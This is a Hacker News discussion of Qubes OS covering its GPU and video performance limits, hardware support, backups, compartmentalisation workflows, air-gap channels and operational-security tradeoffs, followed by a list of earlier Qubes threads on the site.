I think it would be good to make it possible to deactivate certain security features such as strict graphics isolation so that users can adjust their settings to their risk acceptance level. It would also be interesting to be able to optionally replace Xen with lighter isolation mechanisms, even if the user would compromise on security here too.
Around Firefox 92 or 93 the new GPU-based renderer ported from Servo was made default and performance under Qubes became much worse. Unfortunately, it seems applications increasingly assume the presence of video acceleration and don't prioritize software rendering.
Qube's unique choice in software only rendering for user applications is one born out of the isolation goals for security, not what the software/drivers/hardware could do.
Only proprietary ones, so not for everyone...
So the support must be worse if you prefer free drivers?
It feels you may be conflating the "proprietary firmware blob on the GPU which is used to boot the Pi" story with the GPU driver itself.
It kind of feels like a tradeoff between protecting users who are critically in need of something like Qubes or expanding its reach to people who are less at risk and won't use it if it's too inconvenient.
I imagine audio and other realtime loads having problems the most on a heavily virtualized system like this.
I was using it well at home but could not stand it when I travelled around with my laptop.
I think Xen is mostly at fault for the issues, but I’m sure using something like KVM would be insecure, or they would have migrated already.
https://www.qubes-os.org/doc/managing-vm-kernels/#installing...
When I had similar issues in the past, I posted a question either to the mailing list or forum, and people were helpful.
If you choose Community-recommended hardware (https://forum.qubes-os.org/t/community-recommended-computers...), sleep will work fine for you.
This is by design, to provide high security, which is the point of Qubes. It's planned to allow GPU for chosen, trusted VMs: https://github.com/QubesOS/qubes-issues/issues/8552
Alternatively, you could perform a GPU passthrough, https://www.qubes-os.org/faq/#can-i-run-applications-like-ga...
I've been using vms with passed through gpu for a while and it's great but I would love to switch to qubes. I wish this was prioritized.
It might help if you used a computer with CPU horsepower that actually exists.
And in case this sounded facetious, any reasonable CPU from the past 15 years can handle software decoding of high resolution video just fine.
This all said however, if you do actually need full use of all hardware resources then being constrained to software is certainly a factor worth considering.
Brute force helps a lot, but do you want a ≥5GHz multi-core CPU burning 150W just to watch a single video stream with maximum paranoia settings?
I mean, yes?
We're not talking about bloat here, you're deliberately imposing significant overhead load for a specific purpose.
You can't really subsequently complain about performance unless you bring sufficiently powerful hardware to compensate for that overhead.
4k VP9 from youtube takes my 5950x around 20-25% CPU usage to handle with hardware acceleration disabled.
The fastest consumer CPU available 15 years ago could not handle that. Hell, even CPUs from 10 years ago couldn't do that. Add power & thermal limitations of a laptop CPU? Not a chance.
And that's just VP9! HEVC or AV1 would really put the hurt on.
To be pedantic, OP specified "HD" which is 720p. I gave him benefit of the doubt by saying "high resolution" in my reply, but I think 4K is unreasonable given the provided context. I'd wager 1080p ("Full HD") at most. There's also the question of frame rate, though we can probably safely assume either 29.976 or 59.952 fps since it's Youtube.
As an aside, software decoding performance can vary pretty significantly depending on the codec used for both encoding and decoding. Bit of a history lesson, CoreAVC was infamous for being very easy on the CPU compared to other h.264 decoders like ffmpeg.
It often helped to actually give the VM more cores (not just the default 2), but sometimes it was due to some weirdo codec/quality setting, and recoding the video just solved it. Sometimes switching to vlc (from mplayer) helped. Other times it was simply due to the sys-usb vm being overloaded.
Isn't this something GPU Virtualization is intended to solve?
I understand the usual story is that the goal is security benefits, and the compartmentalization (or rather the implied inconvenience) is the price for that. But for me the compartmentalization turned out to be a benefit on it's own, and actually convenient.
I find it extremely convenient to have multiple isolated / virtual workspaces for different stuff, even if you assume attackers / malice do not exist. Having separate VMs is not the same as having separate folders. I also love the VM templates, which allow me to do all kinds of experiments (e.g. install packages in the app VM, which disappear after restart). Or run VMs with a mix of distros/versions/... Yes, I could do some of that with plain VMs, but Qubes integrates that in a way that I find very convenient. The commands for copying stuff between VMs are muscle memory at this point.
Yes, there are limitations, like the lack of GPU acceleration. But movies in 1080p play just fine without it, and I'm not a gamer, so I don't mind much. I can't play with CUDA etc. on these QubesOS machines, and scrolling web pages with large images is laggy, but I find this to be an acceptable price.
I went through multiple laptops / workstations over the years, and the situation improved a lot I think. Initially I had to solve quite a few issues with installer, some hardware not working (or requiring setting something special), or poor battery life on the laptops. But after a while that mostly either went away, especially once I switched to laptops with official Linux support (Dell Precision were good, I'm on Thinkpad P1 G7 now). The battery life is pretty decent too (especially once I disabled HT in BIOS).
Is it perfect for everyone? No, certainly not. But it sure is great for me, and I hope they keep working on it.
Love the compartmentalization and being able to route VMs to different network backends and the ability to create ephemeral domains for quick tasks.
Thank you Joanna, Marek, Andrew, and all the wonderful contributors. I couldn’t live without Qubes.
Now that I've read this, I can also remember that I was also annoyed by jerks when scrolling web pages.
I also found the backup management too complicated. I didn't want to back up entire VMs, just the data within the VMs. In principle, I would have had to start up all VMs for backups and run a backup script for each individual VM.
For backups, I don't them the qubes way, I do "regular" backups within VM using rsync/duplicity/... When moving to a new machine I prefer to setup everything from scratch (and then restore the data). And it gives me all the features like incremental backups etc.
Maybe we need immutable OS + an audit layer on anything that could allow exploits to persist (bashrc and the likes).
The security profiles of many "flatpacked" applications are quite permissive (see https://flatkill.org/) so that they could be circumvented. Besides that I'm experience some convenience issues when accessing files on my drive. It's especially annoying when using "flatpacked" office such as onlyoffice.
Other women who's computing enthusiasm I enjoyed was Jessie Frazelle's writing and speaking about running everything in Docker on her laptop and Sacha Chua's love for Emacs.
In this context, I'd like to mention Dr. Melanie Rieback. She is 'the CEO/Co-founder of Radically Open Security, the world’s first non-profit computer security consultancy company.' Previously in the 00's known for her research in RFID security.
Or have a look at hack conferences such as recently 38C3.
Most of the time, zero days in Xen do not affect Qubes: https://www.qubes-os.org/security/xsa/#statistics
That alternative presumably has better security, but also generally worse usability (particularly if you're going to be mobile! -- two laptops in your bag might be acceptable but comparable isolation would require more than two).
Not necessarily: https://www.qubes-os.org/faq/#how-does-qubes-os-compare-to-u...
Can I run old versions of stuff like MS-DOS or Windows 3.1 under it? Or my beloved Windows 2000? Windows 2000 with Office 2000 pro (with the patches to read the new office 2007 formats) would be awesome. I miss outliner mode in Word 2000.
Basically every criticism you hear is about correct-- principally worse graphics performance and battery life. But the performance issues for me were less bad than I expected, and the seamlessness of its usability was much much higher than I expected.
Like copy and paste, moving files between VMs, plugging usb devices into VMs, networking, etc. all pretty much just work. It's pretty impressive if you have any idea of the machinery under the hood needed to make that work.
And now I don't feel anywhere near as nervous that whatever vendor program I need to use to configure a device or browser zero day is going to compromise my system. I can read documents from adverse threat actor sources in a netless VM and feel reasonably confident that it can't phone home or steal my data, etc.
Obviously it doesn't replace real air gap security, but it's the closest thing you can get to a network of airgapped or firewalled per-application computers which you can fit into a laptop bag.
I also like that I can use software that really only works right on fedora/redhat along side software that really only works right on debian. (Or windows, for that matter, but it's not as seamless). I like that I can substantially upgrade my operating system while running--- like I went from fedora40 to 41 just by installing the template, and switching over appvms one at a time. If anything goes wrong it's trivial to roll back, and I can have some app vms that work fine on the new stuff while others are held back if there is a compatibility issue. I like that applications that go nuts and try to use all my memory only screw up the VM that they're in instead of my whole system.
It's so nice that when I want to get something working I can spin up a vm and scribble all over it until I get it working. Binary patch my libc, whatever. Then once I've solved it, I can apply the final clean solution to a persistent template. Any random experimentation just goes away when I close the appvm. Need some program just for a single thing? install it in the appvm rather than the template and it naturally is gone later. I can be intentional about changes being either ephemeral or persistent, and never have to worry that the removal of something temporary was incomplete.
Of course YMMV, -- if you're someone who is mostly doing text and low performance graphics and can run it on a fast computer then its costs will be small. If you'd find a ten year old computer perfectly usable chances are that qubes on a modern computer won't seem slow or poor battery lifed to you. Particularly if you have other computers for games, 3d gfx, full screen video, etc. If you are someone who has been subjected to targeted hacking attempts the increased peace of mind will be substantial.
Depending on your use case, Qubes can be even more secure:: https://www.qubes-os.org/faq/#how-does-qubes-os-compare-to-u...
- Malware which can bridge air gaps has existed for several years now and is becoming increasingly common.
Floppy disks
Hard disks used like floppies (especially plugged into a RAID controller with "auto run"-like features disabled)
Audio modem
Manual transcription via keyboard
Particularly since the common tools like SCP give way too much access unless you go through special effort.
> Floppy disks, Hard disks
As you note there are 'auto run' like issues, also file systems are not historically very robust against against malicious data.
Hard disks themselves have host flash-able firmware and microcontrollers and get either DMA access (e.g. over SATA) to the system or get USB connected and the ability to pretend to be arbitrary usb devices like HID or exploit vulnerable usb drivers. So at least in theory a compromised system can turn your drive malicious such that it compromises other systems.
Though an attacker that sophisticated probably also has hypervisor escapes.
> Audio modem, Manual transcription
Personally I'm fond of just RS232 serial.
I always thought if you insert a floppy (with any OS autorun crap turned off of course), open a textfile to read, then take it out, you'd be pretty safe. (It's unfortunate the same can't be said of a USB drive).
Thanks, I missed RS-232.
Of course there absolutely have been auto-run vulnerabilities too. And modern Linux desktops have more auto-running auto-indexing stuff than ever. I've absolutely seen mounted drives being eagerly explore by gnome thumbnail generation stuff and likewise.
The challenge for modern security isn't avoiding vulnerabilities, it's avoiding whole classes of behavior that might be vulnerable because the attack surfaces are so huge that we'll inevitably miss vulnerabilities so long as they're not structurally impossible.
So for example, I'd always prefer to interact with a potentially malicious file system via an ephemeral read-only VM that reads the files and exports a network-fs like interface to my working system... It's just too hard to be certain there are no filesystem vulnerabilities-- they have huge surfaces and they're not usually tested against that. I can't even be sure latest genius systemd feature doesn't silently run stuff on removable media (just as it did stuff like given unprivleged users the ability to modify the system time without clearly documenting the change), if it's allowed to touch it. And if there issues are I'll be thankful that the malware payload would have also had to contain a VM escape for it to compromise my system.
Converting untrusted PDFs into trusted ones: The Qubes Way (2013) - https://news.ycombinator.com/item?id=42401904 - Dec 2024 (45 comments)
Why one would use Qubes OS? (2023) - https://news.ycombinator.com/item?id=42200987 - Nov 2024 (16 comments)
Counter argument against QubesOS more secure by being a type 1 hypervisor - https://news.ycombinator.com/item?id=41401318 - Aug 2024 (1 comment)
Qubes OS 4.2.2 has been released - https://news.ycombinator.com/item?id=40959109 - July 2024 (5 comments)
Working with Qubes OS at the Guardian - https://news.ycombinator.com/item?id=39949882 - April 2024 (74 comments)
Qubes OS 4.2.1 has been released - https://news.ycombinator.com/item?id=39833245 - March 2024 (11 comments)
A modest update to Qubes OS - https://news.ycombinator.com/item?id=39490264 - Feb 2024 (31 comments)
Qubes OS 4.2.0 has been released - https://news.ycombinator.com/item?id=38690597 - Dec 2023 (21 comments)
QubesOS – A reasonably secure operating system - https://news.ycombinator.com/item?id=36684946 - July 2023 (135 comments)
Qubes OS 4.2-rc1 is available for testing - https://news.ycombinator.com/item?id=36178205 - June 2023 (3 comments)
New user guide: How to organize your qubes - https://news.ycombinator.com/item?id=33396604 - Oct 2022 (15 comments)
Opsec considerations when using WiFi - https://news.ycombinator.com/item?id=32148920 - July 2022 (2 comments)
What Is Qubes OS? - https://news.ycombinator.com/item?id=32036899 - July 2022 (82 comments)
Automated OS testing on physical laptops - https://news.ycombinator.com/item?id=31281107 - May 2022 (4 comments)
Qubes OS: A reasonably secure operating system - https://news.ycombinator.com/item?id=30776103 - March 2022 (97 comments)
Qubes OS 4.1.0 has been released - https://news.ycombinator.com/item?id=30215210 - Feb 2022 (1 comment)
Ask HN: Qubes OS or just separate VMs for separating work and private files? - https://news.ycombinator.com/item?id=29537961 - Dec 2021 (6 comments)
Qubes OS 4.1-rc1 has been released - https://news.ycombinator.com/item?id=28856957 - Oct 2021 (5 comments)
Qubes OS 4.0 has been released - https://news.ycombinator.com/item?id=16699900 - March 2018 (39 comments)
Qubes OS: A reasonably secure operating system - https://news.ycombinator.com/item?id=15734416 - Nov 2017 (144 comments)
Reasonably Secure Computing in the Decentralized World - https://news.ycombinator.com/item?id=15566563 - Oct 2017 (44 comments)
Toward a Reasonably Secure Laptop - https://news.ycombinator.com/item?id=14743238 - July 2017 (100 comments)
“Paranoid Mode” Compromise Recovery on Qubes OS - https://news.ycombinator.com/item?id=14218504 - April 2017 (14 comments)
Qubes OS Begins Commercialization and Community Funding Efforts - https://news.ycombinator.com/item?id=13069615 - Nov 2016 (24 comments)
Qubes OS 3.2 has been released - https://news.ycombinator.com/item?id=12604417 - Sept 2016 (30 comments)
Security challenges for the Qubes build process - https://news.ycombinator.com/item?id=11801093 - May 2016 (17 comments)
Qubes OS 3.1 has been released - https://news.ycombinator.com/item?id=11260857 - March 2016 (44 comments)
Converting untrusted PDFs into trusted ones: The Qubes Way (2013) - https://news.ycombinator.com/item?id=10538888 - Nov 2015 (5 comments)
Intel x86 considered harmful – survey of attacks against x86 over last 10 years - https://news.ycombinator.com/item?id=10458318 - Oct 2015 (169 comments)
Qubes – Secure Desktop OS Using Security by Compartmentalization - https://news.ycombinator.com/item?id=8428453 - Oct 2014 (49 comments)
Introducing Qubes 1.0 ("a stable and reasonably secure desktop OS") - https://news.ycombinator.com/item?id=4472403 - Sept 2012 (59 comments)
Qubes: an open source OS with strong security for desktop computing - https://news.ycombinator.com/item?id=2645170 - June 2011 (16 comments)
Review: Qubes OS Beta 1 — a new and refreshing approach to system security - https://news.ycombinator.com/item?id=2504274 - May 2011 (1 comment)
The Linux Security Circus: On GUI isolation - https://news.ycombinator.com/item?id=2477667 - April 2011 (47 comments)
Qubes Beta 1 has been released (strong desktop security OS) - https://news.ycombinator.com/item?id=2439096 - April 2011 (3 comments)
Qubes Architecture - actual security-oriented OS - https://news.ycombinator.com/item?id=1796384 - Oct 2010 (1 comment)
Open source Qubes OS is ultra secure - https://news.ycombinator.com/item?id=1249857 - April 2010 (7 comments)
Introducing Qubes OS - https://news.ycombinator.com/item?id=1246990 - April 2010 (20 comments)
We totally forgotten about mandatory access control systems?
AppArmor, SELinux? problem isn’t that they don’t exist; it’s that nobody knows how to use them properly.
You can even minimise the kernel attack surface these days with utilities like gVisor.
people just understand virtual machines easier. It’s easy to understand the isolation it gives and easier to reduce unnecessary potential attack vectors by having minimal images that don’t contain more than necessary.
The problem is that both systems are quite difficult to use properly. The out-of-the-box configuration is good for a base increase in overall system security against common threats.
However, if you want the real isolation benefits that these MAC systems are capable of providing, you'll need a full-time security team with years of training to manage your personal desktop.
Did it help anyone pass any kind of security audit? In other words, do auditors recognize it as a valid environment for working with potentially malicious documents, or only as a toy?
(1) Qubes is open-source.
(2) Qubes is written and maintained by security professionals.
(3) Most (all?) security audits are worse than useless.
Nothing else provides a similar mix of security and usability. The alternatives are either much less secure or have much worse usability.
Of course only few people have these kinds of requirements. I'd recommend Qubes OS if you are an investigative journalist or working in offensive or defensive IT security. Everyone else can safely ignore it.
Still, even if it's not made for most of us it makes interesting design decisions that are very much of interest to this forum. And a lot of the people it is made for are here too
PS Qubes is Linux. The base domain hypervisor is Fedora-based, and while it is possible to run Windows in a "Qube," the docs and tooling clearly concentrate upon Linux (Fedora and Debian) as the primary use case.
This will let you run your email in one window, and click on a link to open it in another VM.
I've used it for a number of years.
You can install KDE, too: https://forum.qubes-os.org/t/kde-changing-the-way-you-use-qu...
When interacting remotely with untrusted services, apps, or documents, Qubes cannot be beaten.
However, if I was afraid of my laptop getting attacked with an evil maid attack, I’m sticking with my Mac, Secure Boot, and FileVault; so that my Lock Screen is less likely to be patched against me. If I’m afraid of persistent malware, I want a platform that isn’t necessarily game over if the malware gets sudo privileges once. If I’m afraid of PIN guessing attempts to break in by brute force, I want something like a modern iPhone where the guessing limit is hardware enforced, not a Linux phone where it’s software enforced.
Same for if I were in a country with a hostile government. Nothing screams “I’m hiding something and I’m malicious” like using GrapheneOS or Qubes in Russia or China. They might not see your work, but the uncommon choices by itself makes you suspect. An iPhone and Mac over there suggests wealth, and would possibly socially increase your benefit of the doubt due to white collar associations; GrapheneOS and Qubes would shred all benefit of doubt you may have enjoyed.
I sometimes think of the Tor incident at a US College. I’m not encouraging this behavior, but a college student sent bomb threats to his university. He was identified, arrested, and convicted because he was the only one using Tor on the university network. A perfect example of how the “more secure” thing used without strategy can shoot yourself in the foot.
The point is: If you are reporting on military activity in the Donetsk region, don’t be the only person in the area using Qubes and Tor. Don’t be the only person in the area with a phone pinging GrapheneOS update servers, or a laptop pinging Qubes package repositories. Heck, don’t be the only guy with a phone on the cell network identifying as Android that inexplicably never talks to Google.
In other threat models, laptops/tablets/phones could be physically secured in a safe, or kept under direct physical supervision.
Sums up WWW.
But I believe you could use a VM or container and use such. For example, with Whonix (which also works in Qubes!)
What I'd like is use such in macOS but alas Jobs & Cook ask premium price for RAM on Macs.
With regards to Donetsk example (I like the example). There is a good reason being hidden in plain sight is blending in with masses. It is difficult to get such OPSEC right, and you need to consider different techniques for if one gets burned.